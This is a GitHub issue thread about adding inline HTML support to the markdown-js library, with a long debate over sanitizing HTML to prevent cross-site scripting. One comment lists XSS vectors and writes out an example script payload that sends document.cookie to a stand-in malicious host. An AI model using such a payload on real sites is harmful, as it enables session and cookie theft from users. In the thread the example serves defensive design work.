
Comments (56)

mansu avatar mansu commented on July 19, 2024 2

+1 for not escaping html in markdown parser.

If this is not going to be fixed, please say so at the top of the README. I just wasted 2 days playing with this library and need to rewrite my parser now.

from markdown-js.

sp avatar sp commented on July 19, 2024 1

I think this is more than a "nice to have" - it's kind of a basic feature of markdown. See http://daringfireball.net/projects/markdown/syntax#html.


ashb avatar ashb commented on July 19, 2024 1

It's basic, but my personal view is that it's a really bad idea to mix Markdown and HTML.

If someone writes the code to do this I'll happily accept it - I'm just not going to write it myself.


ashb avatar ashb commented on July 19, 2024 1

We've got a [Maruku dialect](http://maruku.rubyforge.org/proposal.html) that supports their metadata proposal so you can do:

## Heading ## {: #my-id }

This is a para
{ .my-class }

to add IDs and classes.


awirick avatar awirick commented on July 19, 2024 1

+1 - i'd use this for tables and other non-markdown supported tags (video).


xavi- avatar xavi- commented on July 19, 2024

+1


nddrylliog avatar nddrylliog commented on July 19, 2024

+1 ! :)


nddrylliog avatar nddrylliog commented on July 19, 2024

Well if markdown had something for styling (if only defining CSS classes..), I wouldn't need it. Does anyone have ideas?


xavi- avatar xavi- commented on July 19, 2024

My main issue with the lack of HTML support is that it makes tables much harder. I know there are various implementations/proposals for a table syntax in markdown, but it does not seem like markdown-js supports any.


jarrodbell avatar jarrodbell commented on July 19, 2024

+1 required for any table support (including CSS for styling the tables globally via <STYLE> tags)
Anyone recommend another parser that supports this?


jarrodbell avatar jarrodbell commented on July 19, 2024

Found @cadorn fork which includes HTML inline and works great!
https://github.com/cadorn/markdown-js


ashb avatar ashb commented on July 19, 2024

Can you test that a bit more thoroughly and let me know if it works? Then we'll get it merged in.


jarrodbell avatar jarrodbell commented on July 19, 2024

I've used it for extensive table creation and inline <STYLE> tags, and it works perfectly.


kragen avatar kragen commented on July 19, 2024

This is a duplicate of issue 11.

I don't think cadorn's fork should be merged in in its current state; although it looks like a good solution for applications like writing blog posts you host on your own server, it's only applicable in cases where you completely trust the source of the Markdown, and as such, it would open XSS security holes in applications that are currently using markdown-js to render input across trust boundaries. I'm pasting here the comment that I made on his commit:

So, while on one hand I really want this feature for my application of markdown-js, on the other hand I really want a way to filter the HTML to keep out things like the following:

  • unclosed <blockquote>
  • <script>
  • <a onmouseover>
  • <a href="jscript:...">
  • <a href="mocha:...">
  • <a href=" javascript:...">
  • <iframe>
  • <img width=1 height=1 src="http://...">
  • other things not mentioned here.

I think I'd also be a little happier with something other than false as the tag for as-is blocks. It is JSON-serializable, I suppose... I don't suppose there's a JSONML spec for this kind of thing, is there? Last I checked, the JSONML spec wasn't even clear as to whether the contents of JSONML elements were supposed to be CDATA or PCDATA.

I think another thing that we run into trouble with is entity handling. I ought to be able to write &copy; 2011 Kragen Javier Sitaker in a Markdown document and have the © entity get passed through to the output (as you can see that it is in this comment). And the list from the spec, "<span>, <cite>, or <del>", is just a list of examples, not a complete list of span-level HTML tags; the intent is that any span-level HTML tag can be used in those contexts.

What this adds up to is that we probably need to run all the strings that are the contents of paragraphs, list items, or headers, through a more or less actual HTML parser that can be supplied with whitelists of tags, attributes, and URL schemes, so that it can successfully pass through the subset of well-formed HTML that's right for the application in question. In modern browsers, we could actually use DOMParser, but in Node we might have to use our own. It probably doesn't have to be quite as robust as a browser's parser, since many applications (and basically all applications that use some arbitrary subset of HTML) will give the user a chance to preview and fix their Markdown, so if it barfs on overlapping span-level tags (as GitHub sort of does: <b>overlapping <i>span-level</b> tags</i>) or unclosed tags, it's not a big deal.
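The URL-scheme part of such a whitelist could look roughly like the sketch below. `isAllowedUrl` and its `allowedSchemes` parameter are hypothetical names, not part of markdown-js, and the sketch assumes the attribute value has already been entity-decoded by whatever HTML parser sits in front of it.

```javascript
// Hypothetical helper (not markdown-js API): accept a URL only if it has no
// scheme at all or its scheme is on the caller's whitelist.
function isAllowedUrl(url, allowedSchemes) {
  // Browsers tolerate leading whitespace and embedded tabs/newlines in URLs,
  // so strip control characters and spaces before looking for a scheme.
  // Otherwise " javascript:..." would slip past a naive prefix check.
  const cleaned = String(url).replace(/[\u0000-\u0020]+/g, "");
  const match = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(cleaned);
  if (!match) {
    // No scheme: treated as a relative URL. Note that scheme-relative URLs
    // ("//host/path") also land here; this check is about schemes only.
    return true;
  }
  return allowedSchemes.includes(match[1].toLowerCase());
}

const schemes = ["http", "https", "mailto"];
console.log(isAllowedUrl("https://example.com/", schemes));
console.log(isAllowedUrl(" javascript:alert(1)", schemes));
```

Because the check is a whitelist, schemes such as `jscript:` and `mocha:` are rejected without anyone having to know they exist.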

I'm not proposing that you should do all this work for me; I was just checking out the network to see if someone had already done it. It looks like you're the one that's come closest. Would it be useful to you if I did what I'm describing? Would it remove the need for the code in this commit for you?

(Edited: fixed a typo.)


cadorn avatar cadorn commented on July 19, 2024

@kragen - I am all for a more intelligent HTML parser the way you describe it. I am using this lib to render documentation for my internal projects so there was no need to check the HTML. Should be pretty easy to hook into what I have started.


kragen avatar kragen commented on July 19, 2024

(I've bolded some phrases below to facilitate skimming; hope it's not too annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? I'd really appreciate comments before I go haring off without the benefit of other people's advice and experience.

  • JsonML doesn't have a spec written in English, as far as I can tell, just a BNF grammar and some example implementations in XSLT and JS with the DOM. As far as I can tell, both of the example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug.

I assert that this is a bug, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA — allowed to contain entities but not tags — rather than CDATA (plain text) or HTML (text with entities and tags).

  • Accordingly, when we parse a code block or inline code chunk, we should escape & and < in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about. (I don't propose to include a list of all defined HTML entities into markdown-js.) This means that in general we will not escape HTML on output. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node.
  • The HTML parser used as an input filter should be configurable with whitelists of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, and they need to have an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a git pull on markdown-js and getting privacy and XSS problems added to their application. That is, the default should be safe.
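A minimal sketch of the two escaping rules proposed above, assuming the text leaves have already been separated from any tags by an HTML parser. The function names `escapeCode` and `escapePcdata` are made up for illustration and do not exist in markdown-js.

```javascript
// Hypothetical helpers, not markdown-js API.

// Code spans and code blocks are literal text: escape every "&" and "<".
function escapeCode(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;");
}

// Other text is treated as PCDATA: anything shaped like an entity reference
// (named, decimal, or hex) is kept as-is without consulting a list of known
// entities; only stray "&" and "<" are escaped.
function escapePcdata(text) {
  return text
    .replace(/&(?!(?:[a-zA-Z][a-zA-Z0-9]*|#[0-9]+|#[xX][0-9a-fA-F]+);)/g, "&amp;")
    .replace(/</g, "&lt;");
}

console.log(escapeCode("if (a < b && c) {}"));
console.log(escapePcdata("&copy; 2011 AT&T"));
```

Checking only the shape of an entity reference is what lets `&copy;` pass through without bundling a table of every defined HTML entity.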

I'm hoping I can use an existing pure-JS HTML parser — say, jsdom's, or kn_htmlsafe_htmlSanitize, or NodeHtmlParser — rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make the matter worse. Does anybody have recommendations here?

(In the case where it's running in a modern browser, we could use DOMParser as an optimization, but enough people are using markdown-js in Node that I think it doesn't make sense to depend on that.)

(Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM)

(Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer)

(A forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS)

Other variations:

  1. Parse HTML on output, not input, instead of building JsonML nodes in the intermediate representation.

This has the disadvantage that it would make some kinds of processing on the intermediate representation harder; for example, in yamemex, I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the HTML parsers that can be used beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents — so & would be represented as &amp; in the intermediate representation, not as &, and <b> would mean <b>.
2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and using an exhaustive list of HTML entities to convert things like &copy; © and &ddagger; ‡ to Unicode characters. I think this would be a hassle to maintain. (Note that ‡ doesn't show up correctly here because GitHub has undertaken to maintain such a list for their Markdown implementation — and failed. Visit the URL data:text/html,&ddagger; to see that your browser supports it.)
3. Rather than parsing HTML on input or when rendering each node for output, pass through HTML tags from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. <img src="http://webbugs.example.com/"> the same way regardless of whether it was generated from ![ ](http://webbugs.example.com/) or just included literally in the source; the disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my <ol>s go? Oh, I left ol out of the whitelist."), and it doesn't facilitate intermediate processing in any way.

(My project using markdown-js for, ultimately, social bookmarking.)

So, what do other people think? The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in.


kragen avatar kragen commented on July 19, 2024

I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here:

  1. Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a <blockquote> or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to:

  2. Using Markdown to render stuff pulled (manually or automatically) from another origin. The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as <script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script> or some more subtle way designed to evade naïve filters. Doing this reliably requires that you use a whitelist rather than a blacklist so you don't end up like the stupid losers who built MySpace.

    (As defined in the same-origin policy.)

    (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.)

    Note that this category includes things like blogging software where someone might plausibly copy and paste a piece of someone else's web page in order to quote it.

  3. Using Markdown to render stuff (such as email) sent by a possible spammer or by someone else who has an illegitimate interest in knowing whether you have read it, in which case you do not want to confirm to the spammer that you have read it. In this case you want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as <img src> and <iframe>, as well as all the items covered in #2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let through safe HTML. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.
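For category 3, one possible building block is a same-origin test on resource-loading attributes such as `src`. The sketch below uses the standard `URL` class available in browsers and Node; `loadsFromOtherOrigin` and `documentUrl` are hypothetical names, and the policy of treating unparseable URLs as unsafe is an assumption.

```javascript
// Hypothetical helper: would fetching `src` contact an origin other than the
// one the rendered document is served from (`documentUrl`)?
function loadsFromOtherOrigin(src, documentUrl) {
  let resolved;
  try {
    // Resolve relative and scheme-relative URLs against the document URL.
    resolved = new URL(src, documentUrl);
  } catch (err) {
    return true; // cannot be parsed: err on the side of blocking it
  }
  return resolved.origin !== new URL(documentUrl).origin;
}

const page = "https://mail.example.org/inbox/42";
console.log(loadsFromOtherOrigin("/static/logo.png", page));
console.log(loadsFromOtherOrigin("http://webbugs.example.com/", page));
```

A filter for category 3 would drop `<img>` and `<iframe>` elements for which this returns true, in addition to applying the category 2 checks.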


cadorn avatar cadorn commented on July 19, 2024

I would pull in something like:

Don't parse on output. I think it should make it into the JsonML structure and be sanitized by then.

Keep defaults safe and write minimal code using third party tested libraries where possible.


kragen avatar kragen commented on July 19, 2024

Oh hey! That looks nice! Thanks for finding that! I wonder how much of Caja I'd have to pull in to get it to work. Doesn't look like that much.

In general I'm not that enthusiastic about the quality of random third-party "tested" libraries in JS, but Caja is an exception; the project leads are programmers who use JavaScript, not "JavaScript programmers", and they are good ones.

So if the code can be made to do the job (which is still an "if"), that looks like a better option than the alternatives I suggested earlier. Maybe if I dig in I'll change my mind.

Apache 2.0 license should be okay, right, Ash?


ashb avatar ashb commented on July 19, 2024

Good work on your long comment.

  • PCDATA vs CDATA: you make a good case for it being PCDATA.

  • At which point should the escaping of < or & be done? In the Markdown JsonML or when converting that to HTML JsonML? (Doing it at the first stage seems slightly off to me at first glance, but I've not thought through the implications of this.)

  • the default should be safe

    Absolutely.

Apache 2 is compatible with BSD, right? In any case, I'd prefer that you require another lib/module rather than pull the source in directly. If that's too much of a pain to achieve, then a subdir under lib/caja/ works too.

Above all else it seems you've got it well thought out. So long as there are some docs on how it behaves and it's not too tightly tied to only working in one way, I'm more than happy to accept a pull request. Bonus points for having tests - I'm happy if these only run under node so long as the code itself is portable to browsers.


FireyFly avatar FireyFly commented on July 19, 2024

I'll pitch in on this one. I started using this library yesterday and wrote my own small modifications to markdown.js to handle the two problems presented in this issue (HTML tags and character entities). This was before checking the issues page and finding this recently-discussed topic. :)

My use case is, for now, limited to my own usage (just like cadorn), but it'd be great with something more reliable than what I currently have. My main problem was actually block-level HTML, that I didn't want to be wrapped in a <p>, so my problem is slightly different.

As for the suggestion of pulling in Caja, I think it sounds like a great idea! Might be good to make it optional though, since, well, it is an additional dependency. Perhaps let it be an option which defaults to on, so that people who don't need the feature don't need to have Caja installed (or can remove it if it has to be bundled in lib/).

Anyway, great to see that this is being worked on/that I'm not the only one who wants HTML support.


kragen avatar kragen commented on July 19, 2024

Hey, I just realized I never responded to the comments above. Didn't do anything this weekend, or yesterday.

Everything is compatible with BSD.

I'm trying to get the regression tests running and fix some smaller bugs first — see #26 if curious.


ap avatar ap commented on July 19, 2024

@cadorn:

Don’t parse on output.

Why not…? That is what has always seemed most sensible to me – for the reason @kragen mentioned, that it treats all tags the same whatever their provenance. After all Markdown is by intent a shorthand for the most common of HTML. Whether you write *this* or <em>this</em> should really be immaterial, and both equally allowed or not.


cadorn avatar cadorn commented on July 19, 2024

@ap This library is great because it has the JsonML intermediate layer. I send the JSON to the client and have the client convert it from JSON to HTML. I think HTML should be sanitized as it enters JsonML. The conversion from JsonML to HTML should be a simple dumb transformation so alternative output formats can be easily targeted.

What exactly are the specific problems with this approach? (The comments above are too verbose to follow.)


ashb avatar ashb commented on July 19, 2024

My favoured approach would be to have the HTML parsed and converted into JsonML for two reasons.

The first is as cadorn mentioned. The second is if you parse it into JsonML it should be easier to sanitize/limit the tags that are allowed.

@ap's comment sounds like violent agreement - i.e. you both want the HTML parsed?


ap avatar ap commented on July 19, 2024

Hmm. Basically I consider a Markdown implementation incomplete unless all constructs that can be written using Markdown shorthand can also be written explicitly using the equivalent HTML – i.e. *this* and <em>this</em> should come out the same. (Likewise for <ol><li> and 1., explicit <p> and double newline, etc. etc.)

So if one is filtered, the other should be too, and if not, then neither should be.

Sanitising at the output stage (after the Markdown has become HTML) has the advantage that a) this equivalence just falls out of the implementation directly with zero further effort and b) the sanitiser is not coupled to the Markdown processor.

If you want to sanitise using an intermediate representation that differentiates between Markdown shorthand and explicit HTML then I guess you’d need to use a mapping table or function from Markdown to HTML so that the sanitiser can use it to treat Markdown shorthand syntax as if it were the implied HTML. That would work. The obvious disadvantage is that you are then effectively converting the Markdown to HTML twice, once for the sanitiser and once for output. However, if sanitising happens server-side and the output conversion on the client, then that may be worthwhile anyhow.
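The mapping table mentioned above might be sketched as follows. The node names on the left are assumptions loosely modelled on the names markdown-js uses in its intermediate tree, and `isNodeAllowed` is a hypothetical function, so treat this as an illustration of the idea rather than the library's behaviour.

```javascript
// Illustrative mapping from Markdown-level node names to the HTML tag each
// one implies. The exact node names are an assumption.
const IMPLIED_HTML_TAG = {
  para: "p",
  em: "em",
  strong: "strong",
  bulletlist: "ul",
  numberlist: "ol",
  listitem: "li",
  blockquote: "blockquote",
  inlinecode: "code",
  link: "a",
  img: "img",
};

// Decide whether a node may be emitted. Shorthand nodes are judged by the
// HTML tag they imply, so *this* and <em>this</em> get the same answer.
function isNodeAllowed(nodeName, allowedHtmlTags) {
  const isShorthand = Object.prototype.hasOwnProperty.call(IMPLIED_HTML_TAG, nodeName);
  const htmlTag = isShorthand ? IMPLIED_HTML_TAG[nodeName] : nodeName;
  return allowedHtmlTags.has(htmlTag);
}

const allowed = new Set(["p", "em", "ul", "li"]);
console.log(isNodeAllowed("bulletlist", allowed), isNodeAllowed("ul", allowed));
console.log(isNodeAllowed("numberlist", allowed), isNodeAllowed("ol", allowed));
```

With a table like this, the whitelist is written once in terms of HTML tags and applies to both spellings of the same construct.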

(It would save you the re-parsing using a completely decoupled HTML parser. And maybe the mapping during the sanitisation stage is cheap enough that it is negligible anyway.)

As for targeting alternative output formats, that is essentially a question of converting HTML to the output format in question. Again, by design and intent, Markdown is HTML, just an alternative form that supplies shorthand syntax for a chosen subset of tags. You can convert either all of HTML to the output format or only a defined subset, take your pick – but you convert HTML either way. (E.g. you could pick the subset that only covers the tags which have Markdown shorthands, and that’s fine. Note what this way of looking at it implies: that *this* and <em>this</em> come out the same. Once again.)

Does this help?


cadorn avatar cadorn commented on July 19, 2024

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them). This would give a JsonML graph with markdown and HTML nodes allowing for Markdown syntax within HTML content.

We can then have a special tag with some options to optionally wrap a chunk of HTML to customize how it is to be handled (markdown in content or pure HTML).

On the JsonML -> HTML side any HTML nodes just get dumped.

This may be the best solution but harder to implement using a third party library unless you get more into the guts of it.
We need super fast HTML chunk sanitation and a list of html tags to decide what to do.


ap avatar ap commented on July 19, 2024

That would work, I think. One thing though, things like <em style="font-size: 2em"> cannot be mapped in the HTML→Markdown direction so there is a likelihood that they will be rejected entirely, whereas if you map Markdown→HTML for sanitisation then this tag would probably get its style attribute stripped but then still be allowed through as a bare <em>.

OTOH if you build a hard-coded Markdown-based list of allowed tags into the sanitiser you can get that effect even with a HTML→Markdown mapping. (Which then means you cannot avoid running the sanitiser by simply dropping all explicit HTML tags, because these hard-coded tags must still be allowed through even if nothing else is. But that’s neither here nor there since Markdown = HTML anyway, so either you don’t sanitise at all or you sanitise both forms…)


ashb avatar ashb commented on July 19, 2024

@ap attributes are possible, certainly at the JsonML level, since the Maruku dialect supports this via: *a*{: style="font-size: 2em" } - the JsonML for it would be [ "em", { "style": "font-size: 2em" }, "a" ] (from memory so might be slightly off).
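To make the JsonML shape concrete, here is a minimal sketch of the kind of "simple dumb transformation" from JsonML to HTML discussed earlier in the thread. `renderJsonML` is a hypothetical function, not the renderer shipped with markdown-js. It treats strings as plain text and escapes them, and it does not special-case void elements such as `<br>`.

```javascript
// Hypothetical renderer for JsonML nodes of the form
// [tagName, optionalAttributeObject, ...children], where children are
// strings or nested nodes.
function escapeText(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

function escapeAttr(value) {
  return String(value).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

function isAttributeMap(value) {
  return typeof value === "object" && value !== null && !Array.isArray(value);
}

function renderJsonML(node) {
  if (typeof node === "string") {
    return escapeText(node);
  }
  const [tag, ...rest] = node;
  const hasAttrs = rest.length > 0 && isAttributeMap(rest[0]);
  const attrs = hasAttrs ? rest[0] : {};
  const children = hasAttrs ? rest.slice(1) : rest;
  const attrText = Object.keys(attrs)
    .map((name) => ` ${name}="${escapeAttr(attrs[name])}"`)
    .join("");
  return `<${tag}${attrText}>${children.map(renderJsonML).join("")}</${tag}>`;
}

console.log(renderJsonML(["em", { style: "font-size: 2em" }, "a"]));
```

Under the PCDATA proposal from earlier in the thread, `escapeText` would instead have to leave entity references such as `&copy;` intact.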


ap avatar ap commented on July 19, 2024

I don’t mean whether it is possible to parse them, I mean how they are treated by the sanitiser. If the sanitiser is configured to disallow everything, it should still allow <em style="..."> to pass through as a stripped <em> (if Markdown’s asterisk syntax is permitted), just as output sanitisation after conversion to HTML would behave.

Then if the sanitiser implements equivalence of HTML and Markdown by first mapping HTML to Markdown where there is equivalent Markdown syntax, as @cadorn proposed, then edge cases like this which only half map to Markdown are likely not to work quite like they would with output sanitisation – unless care is taken to support them explicitly.

A good test suite is probably of the essence to ensure that the intent of the explicit support is preserved in the future, though! The separate output HTML filter stage has the advantage that this will all just work as desired by definition, implicitly – it’s robust in a way inline sanitisation is not, albeit, of course, at a performance penalty that we are trying to avoid here.


cadorn avatar cadorn commented on July 19, 2024

This lib is for Markdown -> JsonML -> HTML conversion.
We want it to also do Markdown + HTML -> JsonML -> HTML with various options/configurations to allow inline markdown in HTML and HTML chunks either sanitized or unsanitized.

I have no problem with not being able to go backwards from the resulting HTML to Markdown + HTML if the source HTML used non-standard tags. A warning can be thrown if this happens during the Markdown + HTML -> HTML conversion.

If someone wants bi-directional conversion certain rules must be followed which are too restrictive for many cases.

I want to write website content in Markdown + HTML and want the conversion with HTML and inline Markdown in HTML to JsonML without sanitation as I have control over the source. In this case I want all HTML attributes to come through.

I also want the public to edit markdown + HTML for comments etc... in which sanitation is a must.

I am not going to discuss the same point back and forth any more as I think @ashb and I are on the same page for the overall approach. We just need to work out the details and get coding.


ap avatar ap commented on July 19, 2024

Uh.

It was you who brought up the HTML→Markdown mapping, not me. I never once suggested that, I did not even find any considerations on that use case, and I certainly never pushed for it as a user-visible feature of the library. Trying to convince me that the purpose of markdown-js is Markdown→HTML conversion is a waste of your time – that is already clear to me and I have been talking about only that all along.

If you did not understand the issue I explained, and you can still be bothered to try to, I continue to be willing to explain. If you are tired of the discussion and would rather just go ahead with whatever instead of talk about it, that’s also fine. Just please do not put words in my mouth and then drop the discussion over what I am supposed to have said – all the more so when that thing actually came from yourself.


cadorn avatar cadorn commented on July 19, 2024

I did not mean to put words into your mouth. I don't think I ever suggested HTML -> Markdown. If I did that was a misunderstanding.

I guess I don't understand the issue you are explaining. Can you put it into as few words as possible in the context of my last comment?


ap avatar ap commented on July 19, 2024

No problem.

I was referring to this bit from you:

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them).

This is workable, and will mostly fulfil the criterion I was talking about (that if * is allowed then <em> also should be). But consider what happens if the user types <em onclick="...">.

In the scenario where you sanitise by parsing the output, the sanitiser would certainly be configured to allow em elements (because otherwise it would filter out all emphasis) but certainly would not allow onclick attributes (hello XSS!). So what the user who typed <em onclick="..."> would get is a bare <em> tag.

Now if it works the way you suggested, then you will map <em>this</em> to the moral equivalent of *this* (at the JsonML level) in the pre-sanitiser stage. But you cannot do the same for <em onclick="...">. And then if the sanitiser is configured to allow nothing, it still needs hard-wired knowledge of what is expressible in Markdown, so that it will know to output a stripped <em> tag when it encounters that input, instead of stripping it out completely.

Does that help?


cadorn avatar cadorn commented on July 19, 2024

<em onclick="..."> would be mapped to *this* + attribute map in JsonML from which you can get <em onclick="..."> back on output if sanitize is switched off or the onclick attr is allowed.

I think we need to hard-wire the Markdown <-> HTML tag mappings anyway to make any of this work.

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML. It should not be too difficult to modify a good/portable/purejs HTML parser to do that for us.
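A sanitizer that works on JsonML could be sketched along these lines. The policy format (tag name mapped to a list of permitted attribute names) and the names `DEFAULT_POLICY` and `sanitize` are assumptions made for this example. Attribute values are not inspected here, so `href` would still need a separate URL-scheme check.

```javascript
// Hypothetical whitelist: tag name -> attribute names allowed on that tag.
const DEFAULT_POLICY = {
  p: [],
  em: [],
  strong: [],
  a: ["href", "title"],
};

function isAttributeMap(value) {
  return typeof value === "object" && value !== null && !Array.isArray(value);
}

// Returns a sanitized copy of a JsonML node, or null if the element is not
// whitelisted. Dropping an element also drops its children, which is the
// conservative choice for things like <script>.
function sanitize(node, policy = DEFAULT_POLICY) {
  if (typeof node === "string") {
    return node; // text leaf, nothing to filter
  }
  const [tag, ...rest] = node;
  if (!Object.prototype.hasOwnProperty.call(policy, tag)) {
    return null;
  }
  const hasAttrs = rest.length > 0 && isAttributeMap(rest[0]);
  const attrs = hasAttrs ? rest[0] : {};
  const children = hasAttrs ? rest.slice(1) : rest;

  const keptAttrs = {};
  for (const name of Object.keys(attrs)) {
    if (policy[tag].includes(name.toLowerCase())) {
      keptAttrs[name] = attrs[name];
    }
  }

  const result = [tag];
  if (Object.keys(keptAttrs).length > 0) {
    result.push(keptAttrs);
  }
  for (const child of children) {
    const clean = sanitize(child, policy);
    if (clean !== null) {
      result.push(clean);
    }
  }
  return result;
}

console.log(JSON.stringify(sanitize(["em", { onclick: "steal()" }, "this"])));
```

With this shape, `<em onclick="...">` comes out as a bare `em` node when `onclick` is not whitelisted, which is the behaviour ap asked for; passing a permissive policy covers the trusted-author case.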

@ap So are we on the same page now?


ap avatar ap commented on July 19, 2024

<em onclick="..."> would be mapped to *this* + attribute map in JsonML

Ahhh. Nice. That addresses the issue I was talking about then, excellent.

Yes, I believe we’re on the same page.


ashb avatar ashb commented on July 19, 2024

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML

Agreed. But this also seems like a lot of work if you want to deal with less than well-formed HTML - I would be happy for badly formed HTML to just fall back to being parsed as markdown (i.e. you'd see literal < in the output etc.). Thoughts?
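The fallback could be sketched as a cheap nesting check followed by escaping when the check fails. This is only a rough illustration with made-up names (`isWellNested`, `htmlOrLiteral`, `VOID_TAGS`). It is not a real HTML parser, it is not a security filter, and it will misjudge attribute values that contain `>`.

```javascript
// Tags that never take a closing tag (a small illustrative subset).
const VOID_TAGS = new Set(["br", "hr", "img"]);

// Rough check that every opening tag is closed in the right order.
function isWellNested(fragment) {
  const tagPattern = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b[^<>]*?(\/?)>/g;
  // Any "<" left over after removing recognizable tags is a stray or broken tag.
  if (fragment.replace(tagPattern, "").includes("<")) {
    return false;
  }
  const open = [];
  let match;
  while ((match = tagPattern.exec(fragment)) !== null) {
    const isClosing = match[1] === "/";
    const name = match[2].toLowerCase();
    const isSelfClosing = match[3] === "/";
    if (isClosing) {
      if (open.pop() !== name) {
        return false; // closes something other than the innermost open tag
      }
    } else if (!isSelfClosing && !VOID_TAGS.has(name)) {
      open.push(name);
    }
  }
  return open.length === 0;
}

function escapeHtml(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Pass well-nested HTML through; show anything else as literal text.
function htmlOrLiteral(fragment) {
  return isWellNested(fragment) ? fragment : escapeHtml(fragment);
}

console.log(htmlOrLiteral("<b>overlapping <i>span-level</b> tags</i>"));
```

Sanitizing the fragments that do pass would still be a separate step.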


ap avatar ap commented on July 19, 2024

Maybe it’s possible to tie in an existing HTML5 parser?

Otherwise just showing syntactically bad tags as literal text is fine with me.

(Maybe do that by default with the option of adding a parser so that people can pay the cost only if they want it.)


cadorn avatar cadorn commented on July 19, 2024

@ashb Good suggestion. I think it will come down to the HTML parser.

@ap Yes. I think we should definitely try and re-use an existing parser and convert the AST to JsonML.


cadorn avatar cadorn commented on July 19, 2024

This list may be a good resource to ask for a HTML to JsonML converter or suggestion about which HTML parser to use: https://groups.google.com/group/js-tools

Do we have a spec for JsonML?


xavi- avatar xavi- commented on July 19, 2024

The grammar for JsonML is listed on the website (http://www.jsonml.org/), if that's what you're looking for.


ashb avatar ashb commented on July 19, 2024

And in terms of which node names we use, we kinda just made them up. See... https://github.com/evilstreak/markdown-js/blob/master/lib/markdown.js#L1470-1559


axefrog avatar axefrog commented on July 19, 2024

Why are you guys overcomplicating this? Stick an option in there to allow inline html and leave it at that. Default it to false if you want to. Trying to make the decision for the developer that you need to protect them from scenarios (i.e. cross-site scripting) that are outside the scope of translating markdown to html just causes the library to become bloated, less maintainable and annoys all the people who are expecting it to behave as per the original markdown specification.

I suggest you read http://daringfireball.net/projects/markdown/syntax#html - nowhere does it specify that you should escape HTML tags.

If you're going to make it support less than the markdown specification at a minimum, or behave contrary to how markdown should behave, then you should call it something other than markdown and remove the hold on the "markdown" identifier in the npm registry, as there are a huge number of developers out there who see this library as the "preferred" library for markdown in node.js (or otherwise) and then start using it only to discover that you don't support the proper markdown specification.


ashb avatar ashb commented on July 19, 2024

Even a simple 'allow inline HTML' flag needs some level of HTML parsing to know when to switch back to parsing Markdown again:

Note that Markdown formatting syntax is not processed within block-level HTML tags. E.g., you can’t use Markdown-style emphasis inside an HTML block.

I'm personally against putting inline HTML in my markdown as it just feels wrong to me, which is why I haven't written the code to do this yet. If someone submits a pull request that achieves even simple inline HTML and has some tests, I'm more than happy to merge it in.

from markdown-js.

ap avatar ap commented on July 19, 2024

> I’m personally against putting inline HTML in my Markdown as it just feels wrong to me

You have not attained Markdown nature yet, Ash. :-)

from markdown-js.

ashb avatar ashb commented on July 19, 2024

Just so you are all aware: replying with "+1" and nothing else makes me less likely to want to work on this.

It's going to happen at some point but you aren't helping. I'm going to delete those comments because they just add noise.

from markdown-js.

adam-stokes avatar adam-stokes commented on July 19, 2024

@ashb any word on this bug? it's been a couple years so just curious if this will be implemented or if you've decided not to..

from markdown-js.

misterdai avatar misterdai commented on July 19, 2024

